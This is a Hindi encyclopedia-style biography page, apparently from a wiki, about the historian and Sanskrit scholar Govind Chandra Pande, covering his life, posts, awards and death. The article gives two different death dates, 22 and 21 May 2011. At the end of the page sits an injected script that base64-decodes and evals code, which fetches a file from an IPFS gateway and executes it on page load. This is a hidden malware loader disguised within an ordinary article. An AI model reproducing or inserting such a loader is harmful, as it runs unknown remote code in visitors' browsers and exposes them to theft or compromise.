गोविन्द चन्द्र पाण्डे

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 13:47, 15 मई 2016 का अवतरण (''''गोविन्द चन्द्र पाण्डे''' (अंग्रेज़ी: ''Govind Chandra Pande'', जन...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

गोविन्द चन्द्र पाण्डे (अंग्रेज़ी: Govind Chandra Pande, जन्म- 30 जुलाई, 1923, इलाहाबाद; मृत्यु- 22 मई, 2011, दिल्ली) 20वीं सदी के जानेमाने चिंतक, इतिहासवेत्ता, संस्कृतज्ञ तथा सौंदर्यशास्त्री थे। वे संस्कृत, हिब्रू तथा लेटिन आदि अनेक भाषाओं के असाधारण विद्वान, कई पुस्तकों के प्रसिद्ध लेखक तथा हिन्दी कवि भी थे। प्राचीन भारतीय इतिहास, संस्कृति, बौद्ध दर्शन, साहित्य, इतिहास लेखन तथा दर्शन आदि में गोविन्द चन्द्र पाण्डे को विशेषज्ञता प्राप्त थी। अनेक चर्चित किताबों तथा सैंकड़ों शोध पत्रों के वे लेखक थे। वर्ष 2010 में उन्हें 'पद्मश्री' से सम्मानित किया गया था।

जन्म

आचार्य गोविन्द चन्द्र पाण्डे का जन्म 30 जुलाई, सन 1923 में इलाहाबाद, उत्तर प्रदेश में हुआ था। उत्तर प्रदेश के काशीपुर नगर में आकर बसे अल्मोड़ा के एक ग्राम से निकले सुप्रतिष्ठित पहाड़ी ब्राह्मण परिवार में गोविन्द चन्द्र पाण्डे का जन्म हुआ था। उनके पिता का नाम पीताम्बर दत्त पाण्डे था, जो कि भारत सरकार की लेखा सेवा के उच्च अधिकारी थे और माता का नाम प्रभावती देवी पाण्डे था।

प्रमुख उपलब्धियाँ

  1. गोविन्द चन्द्र पाण्डे ने राजस्थान और इलाहाबाद विश्वविद्यालय के कुलपति के रूप में कार्य किया।
  2. वे 'सेंट्रल इंस्टीट्यूट ऑफ़ हायर तिब्बतन स्टडीज', 'इंडियन इंस्टीट्यूट ऑफ़ एडवान्स्ड स्टडी शिमला' और 'इलाहाबाद म्यूजियम' के अध्यक्ष भी रहे।
  3. कुछ प्रतिष्ठित पुरस्कार, जिसमें ‘मूर्तिदेवी’, साहित्य अकादमी फैलोशिप, ‘विश्व भारती सम्मान’, ‘शंकर सम्मान’ आदि मुख्य हैं, गोविन्द चन्द्र पाण्डे को प्राप्त हुये थे।
  4. 'डी.लिट.' तथा 'वाचस्पति' की मानद उपाधियाँ भी उन्हें प्राप्त हुई थीं।[1]


युवाओं के नाम संदेश-

उत्तराखण्ड के युवाओं को ऋषियों, मनीषियों, विद्वानों तथा नायकों की अपनी प्राचीन विरासत को पुनर्जीवित करना चाहिये।

निधन

अपने जीवन के अंतिम दिनों में गोविन्द चन्द्र पाण्डे अस्वस्थ हो गए थे। 88 वर्ष की परिपक्व अवस्था में दिल्ली में 21 मई, 2011 को उनका निधन हुआ।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. गोविन्द चन्द्र पाण्डे (हिन्दी) merapahadforum.com। अभिगमन तिथि: 15 मई, 2016।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>